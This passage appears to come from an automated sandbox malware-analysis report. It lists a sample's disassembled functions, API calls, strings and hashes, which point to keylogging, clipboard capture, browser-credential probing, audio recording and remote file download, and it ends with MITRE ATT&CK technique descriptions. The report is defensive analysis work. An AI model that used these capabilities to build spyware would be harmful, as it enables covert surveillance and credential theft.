GetProcAddress.KERNEL32(00000000), ref: 004014C0

Strings

User32.dll, xrefs: 004014B4
GetLastInputInfo, xrefs: 004014AF

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetLastInputInfo$User32.dll
API String ID: 2574300362-1519888992
Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F

Uniqueness

Uniqueness Score: -1.00%

Function 0040C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 0040C021
Sleep.KERNEL32(00001388), ref: 0040C0A9

Strings

Cleared browsers logins and cookies., xrefs: 0040C0F5
[Cleared browsers logins and cookies.], xrefs: 0040C0E4

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
API String ID: 3472027048-1236744412
Opcode ID: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
Opcode Fuzzy Hash: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF

Uniqueness

Uniqueness Score: -1.00%

Function 0040A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594

Sleep.KERNEL32(000001F4), ref: 0040A573
Sleep.KERNEL32(00000064), ref: 0040A5FD

Strings

[ , xrefs: 0040A58F
], xrefs: 0040A57B

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Window$SleepText$ForegroundLength
String ID: [ $ ]
API String ID: 3309952895-93608704
Opcode ID: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
Opcode Fuzzy Hash: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB

Uniqueness

Uniqueness Score: -1.00%

Function 0041C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4B2
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4D7
CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E74), ref: 0041C4E5

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
Opcode Fuzzy Hash: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A

Uniqueness

Uniqueness Score: -1.00%

Function 0041C1DD Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: CloseHandleOpenProcess
String ID:
API String ID: 39102293-0
Opcode ID: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
Opcode Fuzzy Hash: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679

Uniqueness

Uniqueness Score: -1.00%

Function 00439863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0043987A

Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC

_UnwindNestedFrames.LIBCMT ref: 00439891
___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
CallCatchBlock.LIBVCRUNTIME ref: 004398C7

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004C), ref: 004193F0
GetSystemMetrics.USER32(0000004D), ref: 004193F6
GetSystemMetrics.USER32(0000004E), ref: 004193FC
GetSystemMetrics.USER32(0000004F), ref: 00419402

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785

Uniqueness

Uniqueness Score: -1.00%

Function 0040B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

__Init_thread_footer.LIBCMT ref: 0040B797

Strings

[End of clipboard], xrefs: 0040B7D9
[Text copied to clipboard], xrefs: 0040B7E6

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: [End of clipboard]$[Text copied to clipboard]
API String ID: 1881088180-3686566968
Opcode ID: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
Opcode Fuzzy Hash: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C

Uniqueness

Uniqueness Score: -1.00%

Function 0044B731 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB6E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B7DB
GetLastError.KERNEL32 ref: 0044B804

Strings

PkGNG, xrefs: 0044B733

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: PkGNG
API String ID: 442123175-263838557
Opcode ID: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
Instruction ID: 56933c973e2243a1a9a6e47b5ff38ff3048756f5123006952a384074424e161b
Opcode Fuzzy Hash: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
Instruction Fuzzy Hash: 12319331A00619DBCB24CF59CD809DAB3F9EF88311F1445AAE509D7361D734ED81CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0044B652 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB8E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B6ED
GetLastError.KERNEL32 ref: 0044B716

Strings

PkGNG, xrefs: 0044B654

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: PkGNG
API String ID: 442123175-263838557
Opcode ID: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
Instruction ID: 12ef57d8ab414bd2a6c5914f5c8b73f84ca543b1ee1fc2f1adbb6bb6aefc8993
Opcode Fuzzy Hash: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
Instruction Fuzzy Hash: 6C21B435600219DFCB14CF69C980BE9B3F8EB48302F1044AAE94AD7351D734ED81CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041663B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00416640
URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: DownloadFileSleep
String ID: !D@
API String ID: 1931167962-604454484
Opcode ID: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
Opcode Fuzzy Hash: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A

Uniqueness

Uniqueness Score: -1.00%

Function 0040B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

CloseHandle.KERNEL32(?), ref: 0040B0B4
UnhookWindowsHookEx.USER32 ref: 0040B0C7

Strings

Online Keylogger Stopped, xrefs: 0040B061, 0040B069, 0040B090

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped
API String ID: 1623830855-1496645233
Opcode ID: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
Opcode Fuzzy Hash: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE

Uniqueness

Uniqueness Score: -1.00%

Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F

Strings

XMG, xrefs: 004017F8

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: wave$BufferHeaderPrepare
String ID: XMG
API String ID: 2315374483-813777761
Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6

Strings

\AppData\Local\Google\Chrome\, xrefs: 0040C4E0
UserProfile, xrefs: 0040C4CA

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Google\Chrome\
API String ID: 1174141254-4188645398
Opcode ID: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
Opcode Fuzzy Hash: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559

Strings

UserProfile, xrefs: 0040C52D
\AppData\Local\Microsoft\Edge\, xrefs: 0040C543

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Microsoft\Edge\
API String ID: 1174141254-2800177040
Opcode ID: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
Opcode Fuzzy Hash: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC

Strings

AppData, xrefs: 0040C590
\Opera Software\Opera Stable\, xrefs: 0040C5A6

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: AppData$\Opera Software\Opera Stable\
API String ID: 1174141254-1629609700
Opcode ID: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
Opcode Fuzzy Hash: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA

Uniqueness

Uniqueness Score: -1.00%

Function 0040B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 0040B64B

Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1

Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662

Strings

[AltL], xrefs: 0040B68D
[AltR], xrefs: 0040B681

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
String ID: [AltL]$[AltR]
API String ID: 2738857842-2658077756
Opcode ID: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
Opcode Fuzzy Hash: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF

Uniqueness

Uniqueness Score: -1.00%

Function 00448957 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996

Strings

GetSystemTimePreciseAsFileTime, xrefs: 00448972
PkGNG, xrefs: 00448959

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Time$FileSystem
String ID: GetSystemTimePreciseAsFileTime$PkGNG
API String ID: 2086374402-949981407
Opcode ID: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
Opcode Fuzzy Hash: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE

Uniqueness

Uniqueness Score: -1.00%

Function 0041618A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8

Strings

!D@, xrefs: 00417089
open, xrefs: 004161A2

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: !D@$open
API String ID: 587946157-1586967515
Opcode ID: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
Opcode Fuzzy Hash: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A

Uniqueness

Uniqueness Score: -1.00%

Function 0045554B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE

Download Yara Rule

APIs

___initconout.LIBCMT ref: 0045555B

Part of subcall function 00456B1D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00455560,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000), ref: 00456B30

WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB19,?), ref: 0045557E

Strings

PkGNG, xrefs: 0045554D

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ConsoleCreateFileWrite___initconout
String ID: PkGNG
API String ID: 3087715906-263838557
Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
Instruction ID: e84ccb038854987deafcb7b601af55b429ad8f27f18c1f17be9b2782bd97289a
Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
Instruction Fuzzy Hash: 10E02B70500508BBD610CB64DC25EB63319EB003B1F600315FE25C72D1EB34DD44C759

Uniqueness

Uniqueness Score: -1.00%

Function 0040B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000012), ref: 0040B6A5

Strings

[CtrlL], xrefs: 0040B6D3
[CtrlR], xrefs: 0040B6C2

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: State
String ID: [CtrlL]$[CtrlR]
API String ID: 1649606143-2446555240
Opcode ID: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
Opcode Fuzzy Hash: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF

Uniqueness

Uniqueness Score: -1.00%

Function 0040E79F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

__Init_thread_footer.LIBCMT ref: 00410F29

Strings

,kG, xrefs: 00410F04
0kG, xrefs: 00410F31

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: ,kG$0kG
API String ID: 1881088180-2015055088
Opcode ID: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
Opcode Fuzzy Hash: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

